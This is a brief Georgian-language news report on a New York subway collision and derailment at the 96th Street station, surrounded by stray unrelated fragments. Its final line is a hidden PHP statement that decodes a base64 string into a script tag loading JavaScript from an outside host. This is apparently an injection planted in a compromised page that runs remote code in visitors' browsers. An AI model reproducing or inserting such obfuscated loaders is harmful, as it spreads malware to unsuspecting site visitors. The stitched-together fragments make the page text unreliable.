celsiusi
ავერსი საქკაბელი

ნიუ იორკის მეტროს მატარებელი მეორე მატარებელს დაეჯახა და რელსებიდან გადავიდა, რის შედეგადაც, სულ მცირე, 26 ადამიანი დაშავდა. შემთხვევამ შეფერხებები გამოიწვია მანჰეტენზე.

მატარებელი, რომელშიც დაახლოებით 300 მგზავრი იმყოფებოდა და მეტროპოლიტენის სატრანსპორტო სამსახურის უმოქმედო მატარებელი, რომელშიც ოთხი მუშა იმყოფებოდა, ერთმანეთს 96-ე ქუჩის სადგურთან შეეჯახნენ.

ოფიციალური პირების განცხადებით, რელსებიდან გადასული მატარებლიდან სამასამდე ადამიანის ევაკუირება განხორციელდა. მეხანძრეებმა ასევე რამდენიმე ასეული ადამიანის ევაკუაცია მოახდინეს მესამე მატარებლიდან, რომელიც შეჯახებაში არ იყო ჩართული, თუმცა შემთხვევის გამო გვირაბში გაჩერება მოუწია.

„საბედნიეროდ, სერიოზულად არავინ დაზიანებულა. ცხადია, რომ ორი მატარებელი არ უნდა ეჯახებოდეს ერთმანეთს. ჩვენ ამ საკითხზე დეტალურად ვიმუშავებთ“, – აღნიშნავს ნიუ-იორკის სატრანზიტო ორგანოს პრეზიდენტი რიჩარდ დეივი.

229
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");